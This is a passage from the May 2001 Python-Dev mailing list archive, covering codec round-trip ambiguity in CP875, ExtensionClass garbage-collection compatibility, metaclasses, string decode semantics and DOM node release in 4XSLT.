Not quite true.  ExtensionClasses (at least recent versions that
worked with 1.5.2) contain a copy of the type object up to and
including the tp_flags field, and the 2.1 code is careful not to use
any newer fields without first checking the corresponding flag bit.

Now, if you are using the 1.4 version of ExtensionClasses you might
not have the tp_flags field either (I don't know, I can't easily
check) but the 1.5.2-compatible version of ExtensionClasses doesn't
even require recompilation to work with Python 2.1.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Sat May 12 22:12:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 22:12:39 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>

> But I don't know whether the ambiguity in cp875 is a bug or an
> undocumented feature

The official (as in "as official as it gets") mapping between CP 875
and Unicode is at

http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT

This is also the file which served as an input to generate cp875.py.

Character 1A, which is the mapping result of these characters, is
indeed known with the name "SUBSTITUTE", apparently following the
definition in

http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm

# substitute character (SUB): A control character that is used in the
# place of a character that is recognized to be invalid or in error or
# that cannot be represented on a given device.

That would suggest that these characters in EBCDIC 875 do not have
equivalents in Unicode. However,

http://www.kostis.net/charsets/ebc875.htm

suggests that the characters in question (3F, DC, E1, EC, ED, FC, and
FD) have no character meaning at all.

It seems that IBM's ICU library also maps U+001A to character 3F, see

http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup

It appears, from looking at

http://www.natural-innovations.com/boo/asciiebcdic.html

that byte 3F *is* the substitution character in EBCDIC. So it is a bug
in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC
character which is mapped to SUBSTITUTE; I think cp875 should be
corrected to always map U+001A to 3F. That is not something the
generator can currently do, though.

So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the
   test (although when looking at the first 128 characters only, it
   is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that
   apparently these characters have no meaning in that code page.
   Unfortunately, I could not find any official IBM documentation
   page that lists the characters supported in each of the EBCDIC
   code pages.

The second seems to be more corrrect to me, although it is a deviation
from the Unicode consortium publications.

Regards,
Martin


From guido at digicool.com  Sat May 12 23:21:21 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:21:21 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400."
             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
References: <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>

> Also: There are two basic implementation models:
> 
> Delegation  [a.k.a. "Lifetime sharing", cloning]
>   sort of like python -- if you don't know how to handle it "ask" 
>   a parent object. ( "ask" in quotes, because I've recently been
>   in a long argument about whether objective-C & smalltalk can
>   really be said to "send messages" , or if it's "just" dynamic
>   lookup and function application! ) 
> 
> Extension  [a.k.a. "Birth sharing", copying, concatenation ]
>   more like how I imaging C++ vtables are built -- the python 
>   equivalent would be like merging all of the class __dict__'s
>   together with name-clase priority going to the nearest
>   relative. 
> 
> ( "Life Sharing" vs. "Birth Sharing" -- is a change in the
>   base class after object creation inherited by the object? )

Interesting.  So is the rest of this thread, but since Python is not a
prototype language and is unlikely to become one, I'd like to mention
that Python 2.2 will likely allow you to choose either paradigm, on a
per-class basis, using metaclasses.

I'm finding metaclasses in Python useful for different things than
they are in Smalltalk, and I expect that they will continue to play a
less important role.  But they are important because they control many
"policy" aspects of Python classes/types: e.g. whether instances have
a __dict__ or a specific set of slots (maybe even typed slots),
whether changes can be made to a class after it's been created, the
semantics of multiple inheritance, and so on.

Right now, my metaclasses continue to be implemented in C, although I
expect that eventually they will be subclassable in Python.  Watch the
descr-branch in the CS tree.  I hope I'll soon have some time to write
a PEP, too.

It's an interesting journey!  The book I am reading about this:
"Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
http://cseng.awl.com/book/0,3828,0201433052,00.html

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Sat May 12 22:53:26 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 16:53:26 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105121640050.261-100000@localhost>


On Sat, 12 May 2001, Guido van Rossum wrote:

> Interesting.  So is the rest of this thread, but since Python is not a
> prototype language and is unlikely to become one, I'd like to mention
> that Python 2.2 will likely allow you to choose either paradigm, on a
> per-class basis, using metaclasses.

 As I said earlier: the only advantage would be if it could simplify 
things "under the hood" (compared to metaclasses) but could still 
provide the same Class semantics (with maybe a "proto" declaration
sneaking it's nose in under the tent.) 
 But I have no immediate idea on how to do that, and it sounds like
you're pretty far along into an implementation already. 

> I'm finding metaclasses in Python useful for different things than
> they are in Smalltalk, and I expect that they will continue to play a
> less important role.  But they are important because they control many
> "policy" aspects of Python classes/types: e.g. whether instances have
> a __dict__ or a specific set of slots (maybe even typed slots),
> whether changes can be made to a class after it's been created, the
> semantics of multiple inheritance, and so on.

 I guess my practical quesion, which I meant to ask before I got
myself sidetracked into preaching prototypes is: How much of the
existing plumbing (specifically the Don Beaudry hack) can I rely
on in the future for the objective-C/python bridge ? 
 With BOOST and Zope's extension classes relying on it, can I 
assume that it's being extended rather than replaced ? 
( I guess I ought to take a look at the code! ) 

> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

Thanks for the reference. 
Talking about interesting journies: 

 Guido: did you ever imagine back at that first workshop at NIST
that you and Python would be where you are today ? 


-- Steve Majewski 


From gmcm at hypernet.com  Sat May 12 23:09:41 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Sat, 12 May 2001 17:09:41 -0400
Subject: [Python-Dev] Type/class
In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com>
References: Your message of "Sat, 12 May 2001 11:07:06 -0400."             <Pine.NXT.4.21.0105121011450.241-100000@localhost> 
Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost>

[Guido]
> It's an interesting journey!  The book I am reading about this:
> "Putting Metaclasses to Work" by Ira Forman and Scott Danforth.
> http://cseng.awl.com/book/0,3828,0201433052,00.html

The two things that struck me most when I read that last year:
 
 - How eminently ill-suited C++ is for this stuff (the book 
develops a framework in C++)

 - a very convincing argument that if you derive C from A and B 
(whose metaclasses are not the same), the system must 
derive a metaclass for C, using MI from A and B's 
metaclasses.

duct-tape-skull-cap-advised-ly y'rs

- Gordon


From tim.one at home.com  Sat May 12 23:22:49 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:22:49 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEMNKBAA.tim.one@home.com>

[/F]
> reverse sorting makes sense to me.  but the cp-files appear to be
> machine generated, so patching that python file won't help.

Agreed.

> a truly future-proof solution would be to specify exactly how to
> resolve every many-to-one mapping, for every font having that
> problem.  but sorting them is clearly better than relying on
> implementation-dependent behaviour...

The attached program suggests the problem is rare; of those encoding files
that have a Python decode_map dict, only these triggered a meaningful
ambiguity complaint:

*** cp1006.py maps 0xfe8e back to 0xb1, 0xb2
*** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd

Then since test_unicode only checks for roundtrip across range(0x80), cp875
is the only one that *can* fail (the ambiguities in cp1006 are for points >
0x7f, so aren't tested here).

Hmm!  Now I see that in a part of test_unicode that wasn't reached, cp875 and
cp1006 are excluded, with this comment:

    ### These fail the round-trip:
    #'cp1006', 'cp875', 'iso8859_8',

So the practical hack for now is to exclude cp875 from the earlier range(128)
roundtrip test too.

> (is Jython using exactly the same hashing and dictionary algorithms as
> CPython?  or does it work by accident also under Jython?)

Sorry, no idea.  Attempting to browse the Jython source on SourceForge caused
this cute behavior:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/

    Python Exception Occurred

    Traceback (innermost last):
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ?
        main()
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main
        view_directory(request)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory
        fileinfo, alltags = get_logs(full_name, rcs_files, view_tag)
      File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs
        raise 'error during rlog: '+hex(status)
    error during rlog: 0x100

let's-rewrite-it-in-php<wink>-ly y'rs  - tim

ENCODING_DIR = "../Lib/encodings"

import os
import imp

def d(w):
    if type(w) is type(6):
        return hex(w)
    else:
        return repr(w)

encfiles = [name for name in os.listdir(ENCODING_DIR)
                 if name.endswith(".py") and name[0] != "_"]

for fname in encfiles:
    path = os.path.join(ENCODING_DIR, fname)
    f = open(path)
    module = imp.load_source(fname[:-3], path, f)
    f.close()
    decode = getattr(module, "decoding_map", None)
    if decode is None:
        print fname, "doesn't have decoding_map."
        continue
    vtok = {}
    for k, v in decode.items():
        if v in vtok:
            vtok[v].append(k)
        else:
            vtok[v] = [k]
    ambiguous = [(v, ks) for v, ks in vtok.items()
                         if len(ks) > 1]
    if ambiguous:
        for v, ks in ambiguous:
            ks.sort()
            print "***", fname, "maps", d(v), "back to", \
                  ", ".join(map(d, ks))
    else:
        print fname, "is free of ambiguous reverse maps."


From tim.one at home.com  Sat May 12 23:48:38 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 12 May 2001 17:48:38 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOENCKBAA.tim.one@home.com>

[Martin v. Loewis, whose encyclopedic knowledge of encoding details
 still isn't enough to get a clear answer (it's like somebody asking
 me for a simple answer to a floating point question <wink>]

> ...
> So I think we can take one of two approaches:
>
> 1. admit that CP 875 is not round-trippable, and exclude it from the
>    test (although when looking at the first 128 characters only, it
>    is round-trippable).

As I noted later, 875 is already excluded from the roundtrip test across
range(128, 256).  What it's failing is the roundtrip test across range(128):
after unicode("?", "cp875") produces u'\x1a', the following .encode('c875')
has no way to know which range the original input came from.  So it's not
really round-trippable across range(128) either unless more info is given to
.encode().

> 2. remove the SUBSTITUTE mappings from CP875, acknowledging that
>    apparently these characters have no meaning in that code page.
>    Unfortunately, I could not find any official IBM documentation
>    page that lists the characters supported in each of the EBCDIC
>    code pages.
>
> The second seems to be more corrrect to me, although it is a deviation
> from the Unicode consortium publications.

Until you and MAL agree on the best thing to do (I have no opinion:  my only
exposure to Unicode in daily programming life remains the Python test suite),
I'm going to opt for #1:  as cp875.py stands today, it's simply a fact that
it's not round-trippable across any range including 0x3f.


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 00:32:10 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 00:32:10 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>

> Now, if you are using the 1.4 version of ExtensionClasses you might
> not have the tp_flags field either (I don't know, I can't easily
> check) but the 1.5.2-compatible version of ExtensionClasses doesn't
> even require recompilation to work with Python 2.1.

I'll attach a copy below of the struct as defined in
pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension
classes). As you can see, it does not provide tp_flags, but has a
field of tp_xxx4 for it.

That *should* work, except that it also has its 'methods' field where
tp_traverse would go, and its class_flags field where tp_clear would
go.

Now, you write

> ExtensionClasses (at least recent versions that worked with 1.5.2)
> contain a copy of the type object up to and including the tp_flags
> field, and the 2.1 code is careful not to use any newer fields
> without first checking the corresponding flag bit.

In this generality, it is apparently not true: Modules/gcmodule.c has,
in delete_garbage,

			if ((clear = op->ob_type->tp_clear) != NULL) {
...
		traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse;
		(void) traverse(PyObject_FROM_GC(gc),
			       (visitproc)visit_decref,
			       NULL);

which does not check any flags. That still shouldn't cause any
problems, since the Gtk objects should never end up in the GC lists -
but may be I'm missing something.

Regards,
Martin

typedef struct {
	PyObject_VAR_HEAD
	char *tp_name; /* For printing */
	int tp_basicsize, tp_itemsize; /* For allocation */
	
	/* Methods to implement standard operations */
	
	destructor tp_dealloc;
	printfunc tp_print;
	getattrfunc tp_getattr;
	setattrfunc tp_setattr;
	cmpfunc tp_compare;
	reprfunc tp_repr;
	
	/* Method suites for standard classes */
	
	PyNumberMethods *tp_as_number;
	PySequenceMethods *tp_as_sequence;
	PyMappingMethods *tp_as_mapping;

	/* More standard operations (at end for binary compatibility) */

	hashfunc tp_hash;
	ternaryfunc tp_call;
	reprfunc tp_str;
	getattrofunc tp_getattro;
	setattrofunc tp_setattro;
	/* Space for future expansion */
	long tp_xxx3;
	long tp_xxx4;

	char *tp_doc; /* Documentation string */

#ifdef COUNT_ALLOCS
	/* these must be last */
	int tp_alloc;
	int tp_free;
	int tp_maxalloc;
	struct _typeobject *tp_next;
#endif
  PyMethodChain methods;
  long class_flags;
  PyObject *class_dictionary;
  PyObject *bases;
  PyObject *reserved;
} PyExtensionClass;


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 14:08:02 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 14:08:02 +0200
Subject: [Python-Dev] ReleaseNode interface in 4XSLT
Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>

Currently, 4XSLT has a dependency on the DOM implementation in terms
of memory management (among other dependencies). I'd like to reduce
this dependency, by providing a centralized function that knows how to
release nodes.

In PyXML, I currently use

# Define ReleaseNode in a DOM-independent way
import xml.dom.ext
import xml.dom.minidom
def _releasenode(n):
    if isinstance(n, xml.dom.minidom.Node):
        n.unlink()
    else:
        xml.dom.ext.ReleaseNode(n)

try:
    from Ft.Lib import pDomlette
    def ReleaseNode(n):
        if isinstance(n, pDomlette.Node):
            pDomlette.ReleaseNode(n)
        else:
            _releasenode(n)
    _XsltElementBase = pDomlette.Element
except ImportError:
    ReleaseNode = _releasenode
    from minisupport import _XsltElementBase

This code knows how to release minidom, 4DOM, and pDomlette nodes, and
supports installations without 4Suite (i.e. without pDomlette). I've
put this into xslt/__init__.py, so that all callers of
Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
If desired, I could produce a patch against the public Ft CVS.

As a slightly independent question, such a function also ought to
support DOM implementations not known to it; I'm thinking in
particular of the Zope DOMs. I'd like to hear proposals on how such an
interface should work; I see three options:

a) it is an operation on the document node (or any node), as in minidom.
b) it is an operation on the DOM implementation (almost as in 4Suite;
   you'd need to navigate from the node to the implementation, then
   you'd need a well-known operation on the implementation)
c) the code assumes that no release activity is necessary for unknown
   DOMs, effectively believing in reference counting, garbage collection,
   acquisition, and other black art.

Any comments appreciated, in particular
1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
2. from authors of other DOMs on a general memory management API for
   Python DOM.

Regards,
Martin


From mwh at python.net  Sun May 13 14:36:26 2001
From: mwh at python.net (Michael Hudson)
Date: 13 May 2001 13:36:26 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com>
Message-ID: <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Fredrik Lundh wrote:
> > can you take that again?  shouldn't michael's example be
> > equivalent to:
> > 
> >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > 
> > if not, I'd argue that your "decode" design is broken, instead
> > of just buggy...
> 
> Well, it is sort of broken, I agree. The reason is that 
> PyString_Encode() and PyString_Decode() guarantee the returned
> object to be a string object. To be able to reuse Unicode codecs
> I added code which converts Unicode back to a string in case the
> codec return an Unicode object (which the .decode() method does).
> This is what's failing.

It strikes me that if someone executes

aString.decode("latin-1")

they're going to expect a unicode string.  AIUI, what's currently
happening is that the string is converted from a latin-1 8-bit string
to the 16-bit unicode string I expected and then there is an attempt
to convert it back to an 8-bit string using the default encoding.  So
if I'd done a 

sys.setdefaultencoding("latin-1")

in my sitecustomize.py, then aString.decode("latin-1") would just be
aString again?  This doesn't seem optimal.

> Perhaps I should simply remove the restriction and have both APIs
> return the codec's return object as-is ?! (I would be in favour of
> this, but I'm not sure whether this is already in use by someone...)

Are all the codecs ditributed with Python 2.1 unicode-related?  If
that's the case, PyString_Decode isn't terribly useful is it?  It
seems unlikely that it received much use.  Could be wrong of course.

OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
operation.  Do we want

open(file).read().decode("jpeg") -> some kind of PIL object

to be possible?

Cheers,
M.

-- 
  GET   *BONK*
  BACK  *BONK*
  IN    *BONK*
  THERE *BONK*             -- Naich using the troll hammer in cam.misc


From mal at lemburg.com  Sun May 13 18:53:55 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 18:53:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> <m31yptqvcl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFEBC22.1F0AF685@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Fredrik Lundh wrote:
> > > can you take that again?  shouldn't michael's example be
> > > equivalent to:
> > >
> > >     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> > >
> > > if not, I'd argue that your "decode" design is broken, instead
> > > of just buggy...
> >
> > Well, it is sort of broken, I agree. The reason is that
> > PyString_Encode() and PyString_Decode() guarantee the returned
> > object to be a string object. To be able to reuse Unicode codecs
> > I added code which converts Unicode back to a string in case the
> > codec return an Unicode object (which the .decode() method does).
> > This is what's failing.
> 
> It strikes me that if someone executes
> 
> aString.decode("latin-1")
> 
> they're going to expect a unicode string.  AIUI, what's currently
> happening is that the string is converted from a latin-1 8-bit string
> to the 16-bit unicode string I expected and then there is an attempt
> to convert it back to an 8-bit string using the default encoding.  So
> if I'd done a
> 
> sys.setdefaultencoding("latin-1")
> 
> in my sitecustomize.py, then aString.decode("latin-1") would just be
> aString again?  This doesn't seem optimal.

True and that's why I am proposing to losen the restriction 
on having the two APIs returning strings only.
 
> > Perhaps I should simply remove the restriction and have both APIs
> > return the codec's return object as-is ?! (I would be in favour of
> > this, but I'm not sure whether this is already in use by someone...)
> 
> Are all the codecs ditributed with Python 2.1 unicode-related?  If
> that's the case, PyString_Decode isn't terribly useful is it?  It
> seems unlikely that it received much use.  Could be wrong of course.

All standard codecs in 2.0 and 2.1 are Unicode related. I am
planning to write up a bunch of string-to-string codecs next
week though which will then be the first non-Unicode related
codecs in 2.2.

> OTOH, maybe I'm trying to wedge to much behaviour onto a a particular
> operation.  Do we want
> 
> open(file).read().decode("jpeg") -> some kind of PIL object
> 
> to be possible?

This would be possible indeed. Even though some may find this
coding style obscure, I think this technique has the same
usefulness as e.g. piping at OS level.

I am thinking of these use cases:

"???".decode("latin-1") -> Unicode (object construction)
"...jpeg data...".decode("jpeg") -> JpegImage object (dito)
"???".decode("latin-1").encode("cp1521") -> string (recoding data)
"...long data...".encode("gzip") -> string (transfer encoding)
"...gzipped data...".decode("gzip") -> string (transfer decoding)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:20:01 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:20:01 +0200
Subject: [Python-Dev] Re: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <3AFEC241.62084286@lemburg.com>

Tim Peters wrote:
> 
> I have a way to make dict lookup a teensy bit cheaper(*) that significantly
> reduces the number of collisions (which is much more valuable).
> 
> This caused a number of std tests to fail, because they were implicitly
> relying on the order in which a dict's entries are materialized via .keys()
> or .items().
> 
> Most of these were easy enough to fix.  The last failure remaining is
> test_unicode, and I don't know how to fix it.  It's dying here:
> 
>     try:
>         verify(unicode(s,encoding).encode(encoding) == s)
>     except TestFailed:
>         print '*** codec "%s" failed round-trip' % encoding
>     except ValueError,why:
>         print '*** codec for "%s" failed: %s' % (encoding, why)
> 
> when encoding == "cp875".  There's a bogus problem you have to worm around
> first:  test_unicode neglected to import TestFailed, so it actually dies
> with NameError while trying the "except TestFailed" clause after verify()
> raises TestFailed.  Once that's repaired, it's complaining about failing the
> round-trip encoding.

Ooops; this must have been caused by the assert statment
removal in the test suite I hacked up some months ago. Funny that
it never showed up... the code seems to be very robust ;-)
 
> The original character in s it's griping about is "?" (0x3f).  cp875.py has
> this entry in its decoding_map dict:
> 
>         0x003f: 0x001a, # SUBSTITUTE
> 
> But 0x1a is not a *unique* value in this dict.  There's also
> 
>         0x00dc: 0x001a, # SUBSTITUTE
>         0x00e1: 0x001a, # SUBSTITUTE
>         0x00ec: 0x001a, # SUBSTITUTE
>         0x00ed: 0x001a, # SUBSTITUTE
>         0x00fc: 0x001a, # SUBSTITUTE
>         0x00fd: 0x001a, # SUBSTITUTE
> 
> Therefore what appears associated with 0x1a in the derived encoding_map
> dict:
> 
> encoding_map = {}
> for k,v in decoding_map.items():
>     encoding_map[v] = k
> 
> may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
> so happened to map back to 0x3f before, but to 0xfd after the dict change,
> so "?" doesn't survive the round trip anymore.

The "right" thing to do here, is to simply remove cp875
from the test for round-tripping. It is not the only encoding
which fails this test, but it's not our fault: the codecs were
all generated from the original codec maps at the Unicode.org site.

If their mappings are broken, we can't do much about it... other
than to ignore the error or remove the codec altogether.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Sun May 13 19:40:58 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 13 May 2001 19:40:58 +0200
Subject: [Python-Dev] IDLE and non-ASCII characters
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>
Message-ID: <3AFEC72A.33076220@lemburg.com>

Martin von Loewis wrote:
> 
> Thanks to a bug report I got, I noticed for the first time that you
> cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
> prompt, you may get
> 
> >>> s='??'
> UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> Likewise, when trying to save a file that has non-ASCII characters,
> you get a traceback.
> 
> Now, I think I understand all the causes of the problem (Tkinter
> returning Unicode objects, and so on). However, I'm curious whether
> anybody has proposals on how to deal with it.
> 
> For saving text files, if Python had an encoding directive, things
> might be easier :-) For the shell prompt, I've no idea how to solve
> this best.
> 
> So any suggestions are welcome.

I have a bug report assigned to myself which indicates similar
problems with _tkinter and Tk/Tcl. There were other problem
reports on the German Python mailing list going in the same
direction too.

The basic problem seems to be that Tk/Tcl applies too much
magic to the text widget contents in order to find out the
used encoding and this can easily cause the whole encoding
mechanism to fail.

A Tk/Tcl expert should really look into this and fix _tkinter.c
to aid Tk/Tcl in not mixing up the encodings (e.g. it would
probably be a good idea to recode Python 8bit-strings into
whatever encoding Tk/Tcl assumes as default).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From Mike.Olson at fourthought.com  Sun May 13 20:15:46 2001
From: Mike.Olson at fourthought.com (Mike Olson)
Date: Sun, 13 May 2001 12:15:46 -0600
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de>
Message-ID: <3AFECF52.FF7E9B26@FourThought.com>

"Martin v. Loewis" wrote:
> 
> 
> In PyXML, I currently use
> 
> # Define ReleaseNode in a DOM-independent way
> import xml.dom.ext
> import xml.dom.minidom
> def _releasenode(n):
>     if isinstance(n, xml.dom.minidom.Node):
>         n.unlink()
>     else:
>         xml.dom.ext.ReleaseNode(n)
> 
> try:
>     from Ft.Lib import pDomlette
>     def ReleaseNode(n):
>         if isinstance(n, pDomlette.Node):
>             pDomlette.ReleaseNode(n)
>         else:
>             _releasenode(n)
>     _XsltElementBase = pDomlette.Element
> except ImportError:
>     ReleaseNode = _releasenode
>     from minisupport import _XsltElementBase
> 
> This code knows how to release minidom, 4DOM, and pDomlette nodes, and
> supports installations without 4Suite (i.e. without pDomlette). I've
> put this into xslt/__init__.py, so that all callers of
> Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode.
> If desired, I could produce a patch against the public Ft CVS.

What if we put these on the implementation, that or came up with a
standard interface on the node.  Then, every DOM imp that wants to be
compatible with xpath/xslt needs to support this interface?


node.ownerDocument.implementation.releaseNode(node)

or

node.py_unlink()


> 
> As a slightly independent question, such a function also ought to
> support DOM implementations not known to it; I'm thinking in
> particular of the Zope DOMs. I'd like to hear proposals on how such an
> interface should work; I see three options:

See above

> 
> a) it is an operation on the document node (or any node), as in minidom.
> b) it is an operation on the DOM implementation (almost as in 4Suite;
>    you'd need to navigate from the node to the implementation, then
>    you'd need a well-known operation on the implementation)
> c) the code assumes that no release activity is necessary for unknown
>    DOMs, effectively believing in reference counting, garbage collection,
>    acquisition, and other black art.

I like either a or b

Mike

> 
> Any comments appreciated, in particular
> 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and
> 2. from authors of other DOMs on a general memory management API for
>    Python DOM.
> 
> Regards,
> Martin
> 
> _______________________________________________
> 4suite mailing list
> 4suite at lists.fourthought.com
> http://lists.fourthought.com/mailman/listinfo/4suite

-- 
Mike Olson				 Principal Consultant
mike.olson at fourthought.com               (303)583-9900 x 102
Fourthought, Inc.                         http://Fourthought.com 
Software-engineering, knowledge-management, XML, CORBA, Linux, Python


From tim.one at home.com  Sun May 13 20:31:42 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 14:31:42 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFEC241.62084286@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> The "right" thing to do here, is to simply remove cp875
> from the test for round-tripping.

I'm relieved you think so, since that's what I already did <wink>.

> It is not the only encoding which fails this test, but it's not
> our fault: the codecs were all generated from the original codec
> maps at the Unicode.org site.
>
> If their mappings are broken, we can't do much about it... other
> than to ignore the error or remove the codec altogether.

On general principle I don't like either of those -- "in the face of
ambiguity, refuse the temptation to guess".  It's at least surprising to see

>>> unicode("?", "cp875").encode("cp875")
'\xfd'
>>>

now, yes?  Would it be better if an ambiguous encoding raised an exception in
"strict" mode?  That is, a third choice is to alert users when they're
relying on a broken part of a mapping.


From martin at loewis.home.cs.tu-berlin.de  Sun May 13 21:08:47 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 13 May 2001 21:08:47 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 12:15:46 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com>
Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de>

> What if we put these on the implementation, that or came up with a
> standard interface on the node.  Then, every DOM imp that wants to be
> compatible with xpath/xslt needs to support this interface?
> 
> 
> node.ownerDocument.implementation.releaseNode(node)
> 
> or
> 
> node.py_unlink()

releaseNode sounds good to me; it is unlikely that W3C would give an
operation that name but a different meaning. Any objections?

Regards,
Martin


From tim.one at home.com  Sun May 13 21:45:40 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 13 May 2001 15:45:40 -0400
Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames
In-Reply-To: <E14yqvu-0008Jb-00@usw-sf-web1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPAKBAA.tim.one@home.com>

